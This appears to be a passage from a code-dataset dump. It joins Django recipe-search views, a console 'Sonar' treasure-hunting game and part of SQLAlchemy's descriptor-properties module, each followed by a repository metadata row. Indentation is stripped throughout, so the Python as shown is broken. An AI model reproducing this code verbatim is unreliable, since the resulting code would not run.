print "====== other_list ======"
print other_list
if request.GET.getlist('add'):
add_list = request.GET.getlist('add')
search_list_temp.extend(add_list)
print "====== add_list ======"
print add_list
"""if 'q' in request.GET:
q = request.GET['q']
q_encode=q.encode('utf8')
split_q = q_encode.split(",")
split_q_nonull = [x for x in split_q if x]
search_list_temp.extend(split_q_nonull)
print "====== Q ======"
print q"""
if 'q2' in request.GET:
q2 = request.GET['q2']
q_encode2=q2.encode('utf8')
split_q2 = q_encode2.split(",")
split_q_nonull2 = [x for x in split_q2 if x]
search_list_temp.extend(split_q_nonull2)
print "**** Q2 ****"
print q2
if 'delete' in request.GET:
delete_list = request.GET.getlist('delete')
print "-- DEL LIST --"
print delete_list
#for d in delete_list:
# search_list.remove(d)
for s in search_list_temp:
search_list.append(s.lower())
print "-- search_list -- "
print search_list
recipe_ingredients_table = RecipeIngredient.objects.filter(reduce(lambda x, y: x | y, [Q(ingredient__contains=word) for word in search_list]))
recipe_list = []
for r in recipe_ingredients_table:
recipe_list.append(r.recipe_name)
recipe_list_unique = list(set(recipe_list))
recipe_name_table = RecipeList.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
######### RANKING RECIPES ######################
recipe_content = RecipeContent2.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
search_set = set(search_list)
print " == SEARCH SET =="
print search_set
s_len = len(search_set)
rank_dic = {}
#for i in xrange(s_len, 0, -1):
for i in range(1, s_len+1):
subsets = set(itertools.combinations(search_set, i))
for x in subsets:
recipe_content_rankwise = recipe_content.filter(reduce(lambda x, y: x | y, [Q(content__contains=word) for word in x]))
qs = recipe_content.filter(reduce(operator.and_, (Q(content__contains=word) for word in x)))
for temp in qs:
rank_dic[temp.recipe_name] = i
#print "--- RANK DICTIONARY --"
sorted_rank_dic = sorted(rank_dic.items(), key=operator.itemgetter(1), reverse=True)
#print sorted_rank_dic
######### END RANKING RECIPES ######################
##########################################################
# Meal type - main, entree, soups, desserts, congee, etc
recipe_name_mealtype_table = []
meal_type = []
meal_type_list = []
if request.GET.getlist('meal_type'):
meal_type = request.GET.getlist('meal_type')
if meal_type[0] == "Desserts":
meal_type_list.append("dessert")
elif meal_type[0] == "Soups":
meal_type_list.append("soup")
elif meal_type[0] == "Congee":
meal_type_list.append("congee")
elif meal_type[0] == "Entree + Main":
meal_type_list.append("entree")
meal_type_list.append("main")
elif meal_type[0] == "All":
meal_type_list.append("entree")
meal_type_list.append("soup")
meal_type_list.append("congee")
meal_type_list.append("main")
meal_type_list.append("dessert")
meal_type_list.append("")
#recipe_name_mealtype_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(category__iexact=word) for word in meal_type_list]))
else:
meal_type_list.append("entree")
meal_type_list.append("soup")
meal_type_list.append("congee")
meal_type_list.append("main")
meal_type_list.append("dessert")
meal_type_list.append("")
recipe_name_mealtype_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(category__iexact=word) for word in meal_type_list]))
##########################################################
# Cuisine type - Australian, Chinese, Indian, etc
recipe_name_cuisinetype_table = []
cuisine_type = []
cuisine_type_list = []
if request.GET.getlist('cuisine_type'):
cuisine_type = request.GET.getlist('cuisine_type')
if cuisine_type[0] == "Australian":
cuisine_type_list.append("Australian")
elif cuisine_type[0] == "Chinese":
cuisine_type_list.append("Chinese")
elif cuisine_type[0] == "Indian":
cuisine_type_list.append("Indian")
elif cuisine_type[0] == "All":
cuisine_type_list.append("Australian")
cuisine_type_list.append("Chinese")
cuisine_type_list.append("Indian")
#recipe_name_cuisinetype_table = recipe_name_mealtype_table.filter(reduce(lambda x, y: x | y, [Q(recipe_type__iexact=word) for word in cuisine_type_list]))
else:
cuisine_type_list.append("Australian")
cuisine_type_list.append("Chinese")
cuisine_type_list.append("Indian")
recipe_name_cuisinetype_table = recipe_name_mealtype_table.filter(reduce(lambda x, y: x | y, [Q(recipe_type__iexact=word) for word in cuisine_type_list]))
# Flavour type - Mixed, Spicy & Flavor, Thick & Creamy etc
recipe_name_tastetype_table = []
taste_type = []
taste_type_list = []
if request.GET.getlist('taste[]'):
taste_type = request.GET.getlist('taste[]')
print "*********"
print taste_type
if "spicy&hot" in taste_type:
taste_type_list.append("spicy&hot")
elif "thick&creamy" in taste_type:
taste_type_list.append("thick&creamy")
elif "light&refresh" in taste_type:
taste_type_list.append("light&refresh")
elif "crispy&crunchy" in taste_type:
taste_type_list.append("crispy&crunchy")
elif "mixed" in taste_type:
taste_type_list.append("spicy&hot")
taste_type_list.append("thick&creamy")
taste_type_list.append("light&refresh")
taste_type_list.append("")
recipe_name_tastetype_table = recipe_name_cuisinetype_table.filter(reduce(lambda x, y: x | y, [Q(taste__iexact=word) for word in taste_type_list]))
#CATEGORY
main_recipes_table = recipe_name_tastetype_table.filter(category__iexact="main")
entree_recipes_table = recipe_name_tastetype_table.filter(category__iexact="entree")
dessert_recipes_table = recipe_name_tastetype_table.filter(category__iexact="dessert")
soup_recipes_table = recipe_name_tastetype_table.filter(category__iexact="soup")
congee_recipes_table = recipe_name_tastetype_table.filter(category__iexact="congee")
main_rank_dictionary = {}
for m in main_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
main_rank_dictionary[recp] = rank_dic[recp]
sorted_main_rank_dic = sorted(main_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
entree_rank_dictionary = {}
for m in entree_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
entree_rank_dictionary[recp] = rank_dic[recp]
sorted_entree_rank_dic = sorted(entree_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
dessert_rank_dictionary = {}
for m in dessert_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
dessert_rank_dictionary[recp] = rank_dic[recp]
sorted_dessert_rank_dic = sorted(dessert_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
soup_rank_dictionary = {}
for m in soup_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
soup_rank_dictionary[recp] = rank_dic[recp]
sorted_soup_rank_dic = sorted(soup_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
congee_rank_dictionary = {}
for m in congee_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
congee_rank_dictionary[recp] = rank_dic[recp]
sorted_congee_rank_dic = sorted(congee_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
return render(request, 'search_results.html',
{'ingredients_name_list': ingredients_name_list,
'checks_list': checks_list,
'recipe_name_table': recipe_name_table,
'recipe_name_tastetype_table': recipe_name_tastetype_table,
'meal_type': meal_type,
'cuisine_type': cuisine_type,
'taste_type': taste_type,
'q2': q2,
'search_set':search_set,
'delete_list':delete_list,
'other_list':other_list,
'sorted_main_rank_dic':sorted_main_rank_dic,
'sorted_entree_rank_dic':sorted_entree_rank_dic,
'sorted_dessert_rank_dic':sorted_dessert_rank_dic,
'sorted_soup_rank_dic':sorted_soup_rank_dic,
'sorted_congee_rank_dic':sorted_congee_rank_dic
})
#message = 'Hello Anushi'
#return HttpResponse(message)
def search_recipes_copy(request):
#if 'q' in request.GET:
# message = 'You searched for: %r' % request.GET['q']
#else:
# message = 'You submitted an empty form.'
#return HttpResponse(message)
request_temp = request
message = "Hello"
if request.method == 'GET':
message = 'Welcome'
search_list = []
taste_search_list = []
checks_list = []
if request.GET.getlist('checks[]'):
checks_list = request.GET.getlist('checks[]')
search_list.extend(checks_list)
print "#############################"
print checks_list
if request.GET['q']:
q = request.GET['q']
q_encode=q.encode('utf8')
split_q = q_encode.split(",")
split_q_nonull = [x for x in split_q if x]
search_list.extend(split_q_nonull)
if request.GET.getlist('taste[]'):
print "**** TASTE *****"
taste_list = request.GET.getlist('taste[]')
taste_search_list.extend(taste_list)
if "" in taste_search_list:
if 'spicy&hot' not in taste_search_list:
taste_search_list.append('spicy&hot')
if 'thick&creamy' not in taste_search_list:
taste_search_list.append('thick&creamy')
if 'light&refresh' not in taste_search_list:
taste_search_list.append('light&refresh')
if 'crispy&crunchy' not in taste_search_list:
taste_search_list.append('crispy&crunchy')
print taste_search_list
print "---------------------------"
recipe_ingredients_table = RecipeIngredient.objects.filter(reduce(lambda x, y: x | y, [Q(ingredient__contains=word) for word in search_list]))
recipe_list = []
for r in recipe_ingredients_table:
recipe_list.append(r.recipe_name)
recipe_list_unique = list(set(recipe_list))
recipe_name_table = RecipeList.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
#TASTE
recipe_name_taste_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(taste__iexact=word) for word in taste_search_list]))
#CATEGORY
main_recipes_table = recipe_name_taste_table.filter(category__iexact="main")
entree_recipes_table = recipe_name_taste_table.filter(category__iexact="entree")
return render(request, 'search_results.html',
{'main_recipes_table': main_recipes_table, 'entree_recipes_table': entree_recipes_table,'query': search_list, 'request_temp': request_temp, 'checks_list': checks_list})
def get_full_recipe(request,recipe_name_arg):
recipe_name_list = RecipeList.objects.filter(recipe_name=recipe_name_arg)
recipe_ingredients_list = RecipeIngredient.objects.filter(recipe_name=recipe_name_arg)
recipe_content = RecipeContent2.objects.filter(recipe_name=recipe_name_arg)
#html = "<html><body>Recipe is : %s </body></html>" % recipe_name
#return HttpResponse(html)
return render(request, 'get_full_recipe.html', {'recipe_name_list': recipe_name_list,'recipe_ingredients_list' : recipe_ingredients_list, 'recipe_content': recipe_content}) | mit | -8,943,540,473,010,711,000 | 35.37018 | 180 | 0.581466 | false |
kallimachos/archive | games/sonar.py | 1 | 6342 | # Sonar
import random
import sys
def drawBoard(board):
# Draw the board data structure.
hline = ' ' # initial space for the numbers down the left side of the board
for i in range(1, 6):
hline += (' ' * 9) + str(i)
# print the numbers across the top
print(hline)
print(' ' + ('0123456789' * 6))
print()
# print each of the 15 rows
for i in range(15):
# single-digit numbers need to be padded with an extra space
if i < 10:
extraSpace = ' '
else:
extraSpace = ''
print('%s%s %s %s' % (extraSpace, i, getRow(board, i), i))
# print the numbers across the bottom
print()
print(' ' + ('0123456789' * 6))
print(hline)
def getRow(board, row):
# Return a string from the board data structure at a certain row.
boardRow = ''
for i in range(60):
boardRow += board[i][row]
return boardRow
def getNewBoard():
# Create a new 60x15 board data structure.
board = []
for x in range(60): # the main list is a list of 60 lists
board.append([])
for y in range(15): # each list in the main list has 15 single-character strings
# use different characters for the ocean to make it more readable.
if random.randint(0, 1) == 0:
board[x].append('~')
else:
board[x].append('`')
return board
def getRandomChests(numChests):
# Create a list of chest data structures (two-item lists of x, y int coordinates)
chests = []
for i in range(numChests):
chests.append([random.randint(0, 59), random.randint(0, 14)])
return chests
def isValidMove(x, y):
# Return True if the coordinates are on the board, otherwise False.
return x >= 0 and x <= 59 and y >= 0 and y <= 14
def makeMove(board, chests, x, y):
# Change the board data structure with a sonar device character. Remove treasure chests
# from the chests list as they are found. Return False if this is an invalid move.
# Otherwise, return the string of the result of this move.
if not isValidMove(x, y):
return False
smallestDistance = 100 # any chest will be closer than 100.
for cx, cy in chests:
if abs(cx - x) > abs(cy - y):
distance = abs(cx - x)
else:
distance = abs(cy - y)
if distance < smallestDistance: # we want the closest treasure chest.
smallestDistance = distance
if smallestDistance == 0:
# xy is directly on a treasure chest!
chests.remove([x, y])
return 'You have found a sunken treasure chest!'
else:
if smallestDistance < 10:
board[x][y] = str(smallestDistance)
return 'Treasure detected at a distance of %s from the sonar device.' % (smallestDistance)
else:
board[x][y] = 'O'
return 'Sonar did not detect anything. All treasure chests out of range.'
def enterPlayerMove():
# Let the player type in her move. Return a two-item list of int xy coordinates.
print('Where do you want to drop the next sonar device? (0-59 0-14) (or type quit)')
while True:
move = raw_input()
if move.lower() == 'quit':
print('Thanks for playing!')
sys.exit()
move = move.split()
if len(move) == 2 and move[0].isdigit() and move[1].isdigit() and isValidMove(int(move[0]), int(move[1])):
return [int(move[0]), int(move[1])]
print('Enter a number from 0 to 59, a space, then a number from 0 to 14.')
def playAgain():
# This function returns True if the player wants to play again, otherwise it returns False.
print('Do you want to play again? (yes or no)')
return raw_input().lower().startswith('y')
def showInstructions():
print('''Instructions:
You are the captain of the Simon, a treasure-hunting ship. Your current mission
is to find the three sunken treasure chests that are lurking in the part of the
ocean you are in and collect them.
To play, enter the coordinates of the point in the ocean you wish to drop a
sonar device. The sonar can find out how far away the closest chest is to it.
For example, the d below marks where the device was dropped, and the 2's
represent distances of 2 away from the device. The 4's represent
distances of 4 away from the device.
444444444
4 4
4 22222 4
4 2 2 4
4 2 d 2 4
4 2 2 4
4 22222 4
4 4
444444444
Press enter to continue...''')
raw_input()
print('''For example, here is a treasure chest (the c) located a distance of 2 away
from the sonar device (the d):
22222
c 2
2 d 2
2 2
22222
The point where the device was dropped will be marked with a d.
The treasure chests don't move around. Sonar devices can detect treasure
chests up to a distance of 9. If all chests are out of range, the point
will be marked with O
If a device is directly dropped on a treasure chest, you have discovered
the location of the chest, and it will be collected. The sonar device will
remain there.
When you collect a chest, all sonar devices will update to locate the next
closest sunken treasure chest.
Press enter to continue...''')
raw_input()
print()
print('S O N A R !')
print ""
print('Would you like to view the instructions? (yes/no)')
if raw_input().lower().startswith('y'):
showInstructions()
while True:
# game setup
sonarDevices = 16
theBoard = getNewBoard()
theChests = getRandomChests(3)
drawBoard(theBoard)
previousMoves = []
while sonarDevices > 0:
# Start of a turn:
# show sonar device/chest status
if sonarDevices > 1: extraSsonar = 's'
else: extraSsonar = ''
if len(theChests) > 1: extraSchest = 's'
else: extraSchest = ''
print('You have %s sonar device%s left. %s treasure chest%s remaining.' % (sonarDevices, extraSsonar, len(theChests), extraSchest))
x, y = enterPlayerMove()
previousMoves.append([x, y]) # we must track all moves so that sonar devices can be updated.
moveResult = makeMove(theBoard, theChests, x, y)
if moveResult == False:
continue
else:
if moveResult == 'You have found a sunken treasure chest!':
# update all the sonar devices currently on the map.
for x, y in previousMoves:
makeMove(theBoard, theChests, x, y)
drawBoard(theBoard)
print(moveResult)
if len(theChests) == 0:
print('You have found all the sunken treasure chests! Congratulations and good game!')
break
sonarDevices -= 1
if sonarDevices == 0:
print('We\'ve run out of sonar devices! Now we have to turn the ship around and head')
print('for home with treasure chests still out there! Game over.')
print(' The remaining chests were here:')
for x, y in theChests:
print(' %s, %s' % (x, y))
if not playAgain():
sys.exit()
| gpl-3.0 | -1,569,769,953,806,892,800 | 35.034091 | 133 | 0.694734 | false |
fernandog/Medusa | ext/sqlalchemy/orm/descriptor_props.py | 1 | 27751 | # orm/descriptor_props.py
# Copyright (C) 2005-2018 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Descriptor properties are more "auxiliary" properties
that exist as configurational elements, but don't participate
as actively in the load/persist ORM loop.
"""
from .interfaces import MapperProperty, PropComparator
from .util import _none_set
from . import attributes
from .. import util, sql, exc as sa_exc, event, schema
from ..sql import expression
from . import properties
from . import query
class DescriptorProperty(MapperProperty):
""":class:`.MapperProperty` which proxies access to a
user-defined descriptor."""
doc = None
def instrument_class(self, mapper):
prop = self
class _ProxyImpl(object):
accepts_scalar_loader = False
expire_missing = True
collection = False
def __init__(self, key):
self.key = key
if hasattr(prop, 'get_history'):
def get_history(self, state, dict_,
passive=attributes.PASSIVE_OFF):
return prop.get_history(state, dict_, passive)
if self.descriptor is None:
desc = getattr(mapper.class_, self.key, None)
if mapper._is_userland_descriptor(desc):
self.descriptor = desc
if self.descriptor is None:
def fset(obj, value):
setattr(obj, self.name, value)
def fdel(obj):
delattr(obj, self.name)
def fget(obj):
return getattr(obj, self.name)
self.descriptor = property(
fget=fget,
fset=fset,
fdel=fdel,
)
proxy_attr = attributes.create_proxied_attribute(
self.descriptor)(
self.parent.class_,
self.key,
self.descriptor,
lambda: self._comparator_factory(mapper),
doc=self.doc,
original_property=self
)
proxy_attr.impl = _ProxyImpl(self.key)
mapper.class_manager.instrument_attribute(self.key, proxy_attr)
@util.langhelpers.dependency_for("sqlalchemy.orm.properties")
class CompositeProperty(DescriptorProperty):
"""Defines a "composite" mapped attribute, representing a collection
of columns as one attribute.
:class:`.CompositeProperty` is constructed using the :func:`.composite`
function.
.. seealso::
:ref:`mapper_composite`
"""
def __init__(self, class_, *attrs, **kwargs):
r"""Return a composite column-based property for use with a Mapper.
See the mapping documentation section :ref:`mapper_composite` for a
full usage example.
The :class:`.MapperProperty` returned by :func:`.composite`
is the :class:`.CompositeProperty`.
:param class\_:
The "composite type" class.
:param \*cols:
List of Column objects to be mapped.
:param active_history=False:
When ``True``, indicates that the "previous" value for a
scalar attribute should be loaded when replaced, if not
already loaded. See the same flag on :func:`.column_property`.
.. versionchanged:: 0.7
This flag specifically becomes meaningful
- previously it was a placeholder.
:param group:
A group name for this property when marked as deferred.
:param deferred:
When True, the column property is "deferred", meaning that it does
not load immediately, and is instead loaded when the attribute is
first accessed on an instance. See also
:func:`~sqlalchemy.orm.deferred`.
:param comparator_factory: a class which extends
:class:`.CompositeProperty.Comparator` which provides custom SQL
clause generation for comparison operations.
:param doc:
optional string that will be applied as the doc on the
class-bound descriptor.
:param info: Optional data dictionary which will be populated into the
:attr:`.MapperProperty.info` attribute of this object.
.. versionadded:: 0.8
:param extension:
an :class:`.AttributeExtension` instance,
or list of extensions, which will be prepended to the list of
attribute listeners for the resulting descriptor placed on the
class. **Deprecated.** Please see :class:`.AttributeEvents`.
"""
super(CompositeProperty, self).__init__()
self.attrs = attrs
self.composite_class = class_
self.active_history = kwargs.get('active_history', False)
self.deferred = kwargs.get('deferred', False)
self.group = kwargs.get('group', None)
self.comparator_factory = kwargs.pop('comparator_factory',
self.__class__.Comparator)
if 'info' in kwargs:
self.info = kwargs.pop('info')
util.set_creation_order(self)
self._create_descriptor()
def instrument_class(self, mapper):
super(CompositeProperty, self).instrument_class(mapper)
self._setup_event_handlers()
def do_init(self):
"""Initialization which occurs after the :class:`.CompositeProperty`
has been associated with its parent mapper.
"""
self._setup_arguments_on_columns()
def _create_descriptor(self):
"""Create the Python descriptor that will serve as
the access point on instances of the mapped class.
"""
def fget(instance):
dict_ = attributes.instance_dict(instance)
state = attributes.instance_state(instance)
if self.key not in dict_:
# key not present. Iterate through related
# attributes, retrieve their values. This
# ensures they all load.
values = [
getattr(instance, key)
for key in self._attribute_keys
]
# current expected behavior here is that the composite is
# created on access if the object is persistent or if
# col attributes have non-None. This would be better
# if the composite were created unconditionally,
# but that would be a behavioral change.
if self.key not in dict_ and (
state.key is not None or
not _none_set.issuperset(values)
):
dict_[self.key] = self.composite_class(*values)
state.manager.dispatch.refresh(state, None, [self.key])
return dict_.get(self.key, None)
def fset(instance, value):
dict_ = attributes.instance_dict(instance)
state = attributes.instance_state(instance)
attr = state.manager[self.key]
previous = dict_.get(self.key, attributes.NO_VALUE)
for fn in attr.dispatch.set:
value = fn(state, value, previous, attr.impl)
dict_[self.key] = value
if value is None:
for key in self._attribute_keys:
setattr(instance, key, None)
else:
for key, value in zip(
self._attribute_keys,
value.__composite_values__()):
setattr(instance, key, value)
def fdel(instance):
state = attributes.instance_state(instance)
dict_ = attributes.instance_dict(instance)
previous = dict_.pop(self.key, attributes.NO_VALUE)
attr = state.manager[self.key]
attr.dispatch.remove(state, previous, attr.impl)
for key in self._attribute_keys:
setattr(instance, key, None)
self.descriptor = property(fget, fset, fdel)
@util.memoized_property
def _comparable_elements(self):
return [
getattr(self.parent.class_, prop.key)
for prop in self.props
]
@util.memoized_property
def props(self):
props = []
for attr in self.attrs:
if isinstance(attr, str):
prop = self.parent.get_property(
attr, _configure_mappers=False)
elif isinstance(attr, schema.Column):
prop = self.parent._columntoproperty[attr]
elif isinstance(attr, attributes.InstrumentedAttribute):
prop = attr.property
else:
raise sa_exc.ArgumentError(
"Composite expects Column objects or mapped "
"attributes/attribute names as arguments, got: %r"
% (attr,))
props.append(prop)
return props
@property
def columns(self):
return [a for a in self.attrs if isinstance(a, schema.Column)]
def _setup_arguments_on_columns(self):
"""Propagate configuration arguments made on this composite
to the target columns, for those that apply.
"""
for prop in self.props:
prop.active_history = self.active_history
if self.deferred:
prop.deferred = self.deferred
prop.strategy_key = (
("deferred", True),
("instrument", True))
prop.group = self.group
def _setup_event_handlers(self):
"""Establish events that populate/expire the composite attribute."""
def load_handler(state, *args):
_load_refresh_handler(state, args, is_refresh=False)
def refresh_handler(state, *args):
_load_refresh_handler(state, args, is_refresh=True)
def _load_refresh_handler(state, args, is_refresh):
dict_ = state.dict
if not is_refresh and self.key in dict_:
return
# if column elements aren't loaded, skip.
# __get__() will initiate a load for those
# columns
for k in self._attribute_keys:
if k not in dict_:
return
dict_[self.key] = self.composite_class(
*[state.dict[key] for key in
self._attribute_keys]
)
def expire_handler(state, keys):
if keys is None or set(self._attribute_keys).intersection(keys):
state.dict.pop(self.key, None)
def insert_update_handler(mapper, connection, state):
"""After an insert or update, some columns may be expired due
to server side defaults, or re-populated due to client side
defaults. Pop out the composite value here so that it
recreates.
"""
state.dict.pop(self.key, None)
event.listen(self.parent, 'after_insert',
insert_update_handler, raw=True)
event.listen(self.parent, 'after_update',
insert_update_handler, raw=True)
event.listen(self.parent, 'load',
load_handler, raw=True, propagate=True)
event.listen(self.parent, 'refresh',
refresh_handler, raw=True, propagate=True)
event.listen(self.parent, 'expire',
expire_handler, raw=True, propagate=True)
# TODO: need a deserialize hook here
@util.memoized_property
def _attribute_keys(self):
return [
prop.key for prop in self.props
]
def get_history(self, state, dict_, passive=attributes.PASSIVE_OFF):
"""Provided for userland code that uses attributes.get_history()."""
added = []
deleted = []
has_history = False
for prop in self.props:
key = prop.key
hist = state.manager[key].impl.get_history(state, dict_)
if hist.has_changes():
has_history = True
non_deleted = hist.non_deleted()
if non_deleted:
added.extend(non_deleted)
else:
added.append(None)
if hist.deleted:
deleted.extend(hist.deleted)
else:
deleted.append(None)
if has_history:
return attributes.History(
[self.composite_class(*added)],
(),
[self.composite_class(*deleted)]
)
else:
return attributes.History(
(), [self.composite_class(*added)], ()
)
def _comparator_factory(self, mapper):
return self.comparator_factory(self, mapper)
class CompositeBundle(query.Bundle):
def __init__(self, property, expr):
self.property = property
super(CompositeProperty.CompositeBundle, self).__init__(
property.key, *expr)
def create_row_processor(self, query, procs, labels):
def proc(row):
return self.property.composite_class(
*[proc(row) for proc in procs])
return proc
class Comparator(PropComparator):
"""Produce boolean, comparison, and other operators for
:class:`.CompositeProperty` attributes.
See the example in :ref:`composite_operations` for an overview
of usage , as well as the documentation for :class:`.PropComparator`.
See also:
:class:`.PropComparator`
:class:`.ColumnOperators`
:ref:`types_operators`
:attr:`.TypeEngine.comparator_factory`
"""
__hash__ = None
@property
def clauses(self):
return self.__clause_element__()
def __clause_element__(self):
return expression.ClauseList(
group=False, *self._comparable_elements)
def _query_clause_element(self):
return CompositeProperty.CompositeBundle(
self.prop, self.__clause_element__())
def _bulk_update_tuples(self, value):
if value is None:
values = [None for key in self.prop._attribute_keys]
elif isinstance(value, self.prop.composite_class):
values = value.__composite_values__()
else:
raise sa_exc.ArgumentError(
"Can't UPDATE composite attribute %s to %r" %
(self.prop, value))
return zip(
self._comparable_elements,
values
)
@util.memoized_property
def _comparable_elements(self):
if self._adapt_to_entity:
return [
getattr(
self._adapt_to_entity.entity,
prop.key
) for prop in self.prop._comparable_elements
]
else:
return self.prop._comparable_elements
def __eq__(self, other):
if other is None:
values = [None] * len(self.prop._comparable_elements)
else:
values = other.__composite_values__()
comparisons = [
a == b
for a, b in zip(self.prop._comparable_elements, values)
]
if self._adapt_to_entity:
comparisons = [self.adapter(x) for x in comparisons]
return sql.and_(*comparisons)
def __ne__(self, other):
return sql.not_(self.__eq__(other))
def __str__(self):
return str(self.parent.class_.__name__) + "." + self.key
@util.langhelpers.dependency_for("sqlalchemy.orm.properties")
class ConcreteInheritedProperty(DescriptorProperty):
"""A 'do nothing' :class:`.MapperProperty` that disables
an attribute on a concrete subclass that is only present
on the inherited mapper, not the concrete classes' mapper.
Cases where this occurs include:
* When the superclass mapper is mapped against a
"polymorphic union", which includes all attributes from
all subclasses.
* When a relationship() is configured on an inherited mapper,
but not on the subclass mapper. Concrete mappers require
that relationship() is configured explicitly on each
subclass.
"""
def _comparator_factory(self, mapper):
comparator_callable = None
for m in self.parent.iterate_to_root():
p = m._props[self.key]
if not isinstance(p, ConcreteInheritedProperty):
comparator_callable = p.comparator_factory
break
return comparator_callable
def __init__(self):
super(ConcreteInheritedProperty, self).__init__()
def warn():
raise AttributeError("Concrete %s does not implement "
"attribute %r at the instance level. Add "
"this property explicitly to %s." %
(self.parent, self.key, self.parent))
class NoninheritedConcreteProp(object):
def __set__(s, obj, value):
warn()
def __delete__(s, obj):
warn()
def __get__(s, obj, owner):
if obj is None:
return self.descriptor
warn()
self.descriptor = NoninheritedConcreteProp()
@util.langhelpers.dependency_for("sqlalchemy.orm.properties")
class SynonymProperty(DescriptorProperty):
def __init__(self, name, map_column=None,
descriptor=None, comparator_factory=None,
doc=None, info=None):
"""Denote an attribute name as a synonym to a mapped property,
in that the attribute will mirror the value and expression behavior
of another attribute.
e.g.::
class MyClass(Base):
__tablename__ = 'my_table'
id = Column(Integer, primary_key=True)
job_status = Column(String(50))
status = synonym("job_status")
:param name: the name of the existing mapped property. This
can refer to the string name ORM-mapped attribute
configured on the class, including column-bound attributes
and relationships.
:param descriptor: a Python :term:`descriptor` that will be used
as a getter (and potentially a setter) when this attribute is
accessed at the instance level.
:param map_column: **For classical mappings and mappings against
an existing Table object only**. if ``True``, the :func:`.synonym`
construct will locate the :class:`.Column` object upon the mapped
table that would normally be associated with the attribute name of
this synonym, and produce a new :class:`.ColumnProperty` that instead
maps this :class:`.Column` to the alternate name given as the "name"
argument of the synonym; in this way, the usual step of redefining
the mapping of the :class:`.Column` to be under a different name is
unnecessary. This is usually intended to be used when a
:class:`.Column` is to be replaced with an attribute that also uses a
descriptor, that is, in conjunction with the
:paramref:`.synonym.descriptor` parameter::
my_table = Table(
"my_table", metadata,
Column('id', Integer, primary_key=True),
Column('job_status', String(50))
)
class MyClass(object):
@property
def _job_status_descriptor(self):
return "Status: %s" % self._job_status
mapper(
MyClass, my_table, properties={
"job_status": synonym(
"_job_status", map_column=True,
descriptor=MyClass._job_status_descriptor)
}
)
Above, the attribute named ``_job_status`` is automatically
mapped to the ``job_status`` column::
>>> j1 = MyClass()
>>> j1._job_status = "employed"
>>> j1.job_status
Status: employed
When using Declarative, in order to provide a descriptor in
conjunction with a synonym, use the
:func:`sqlalchemy.ext.declarative.synonym_for` helper. However,
note that the :ref:`hybrid properties <mapper_hybrids>` feature
should usually be preferred, particularly when redefining attribute
behavior.
:param info: Optional data dictionary which will be populated into the
:attr:`.InspectionAttr.info` attribute of this object.
.. versionadded:: 1.0.0
:param comparator_factory: A subclass of :class:`.PropComparator`
that will provide custom comparison behavior at the SQL expression
level.
.. note::
For the use case of providing an attribute which redefines both
Python-level and SQL-expression level behavior of an attribute,
please refer to the Hybrid attribute introduced at
:ref:`mapper_hybrids` for a more effective technique.
.. seealso::
:ref:`synonyms` - Overview of synonyms
:func:`.synonym_for` - a helper oriented towards Declarative
:ref:`mapper_hybrids` - The Hybrid Attribute extension provides an
updated approach to augmenting attribute behavior more flexibly
than can be achieved with synonyms.
"""
super(SynonymProperty, self).__init__()
self.name = name
self.map_column = map_column
self.descriptor = descriptor
self.comparator_factory = comparator_factory
self.doc = doc or (descriptor and descriptor.__doc__) or None
if info:
self.info = info
util.set_creation_order(self)
# TODO: when initialized, check _proxied_property,
# emit a warning if its not a column-based property
@util.memoized_property
def _proxied_property(self):
attr = getattr(self.parent.class_, self.name)
if not hasattr(attr, 'property') or not \
isinstance(attr.property, MapperProperty):
raise sa_exc.InvalidRequestError(
"""synonym() attribute "%s.%s" only supports """
"""ORM mapped attributes, got %r""" % (
self.parent.class_.__name__,
self.name,
attr
)
)
return attr.property
def _comparator_factory(self, mapper):
prop = self._proxied_property
if self.comparator_factory:
comp = self.comparator_factory(prop, mapper)
else:
comp = prop.comparator_factory(prop, mapper)
return comp
def set_parent(self, parent, init):
if self.map_column:
# implement the 'map_column' option.
if self.key not in parent.mapped_table.c:
raise sa_exc.ArgumentError(
"Can't compile synonym '%s': no column on table "
"'%s' named '%s'"
% (self.name, parent.mapped_table.description, self.key))
elif parent.mapped_table.c[self.key] in \
parent._columntoproperty and \
parent._columntoproperty[
parent.mapped_table.c[self.key]
].key == self.name:
raise sa_exc.ArgumentError(
"Can't call map_column=True for synonym %r=%r, "
"a ColumnProperty already exists keyed to the name "
"%r for column %r" %
(self.key, self.name, self.name, self.key)
)
p = properties.ColumnProperty(parent.mapped_table.c[self.key])
parent._configure_property(
self.name, p,
init=init,
setparent=True)
p._mapped_by_synonym = self.key
self.parent = parent
@util.langhelpers.dependency_for("sqlalchemy.orm.properties")
class ComparableProperty(DescriptorProperty):
"""Instruments a Python property for use in query expressions."""
def __init__(
self, comparator_factory, descriptor=None, doc=None, info=None):
"""Provides a method of applying a :class:`.PropComparator`
to any Python descriptor attribute.
.. versionchanged:: 0.7
:func:`.comparable_property` is superseded by
the :mod:`~sqlalchemy.ext.hybrid` extension. See the example
at :ref:`hybrid_custom_comparators`.
Allows any Python descriptor to behave like a SQL-enabled
attribute when used at the class level in queries, allowing
redefinition of expression operator behavior.
In the example below we redefine :meth:`.PropComparator.operate`
to wrap both sides of an expression in ``func.lower()`` to produce
case-insensitive comparison::
from sqlalchemy.orm import comparable_property
from sqlalchemy.orm.interfaces import PropComparator
from sqlalchemy.sql import func
from sqlalchemy import Integer, String, Column
from sqlalchemy.ext.declarative import declarative_base
class CaseInsensitiveComparator(PropComparator):
def __clause_element__(self):
return self.prop
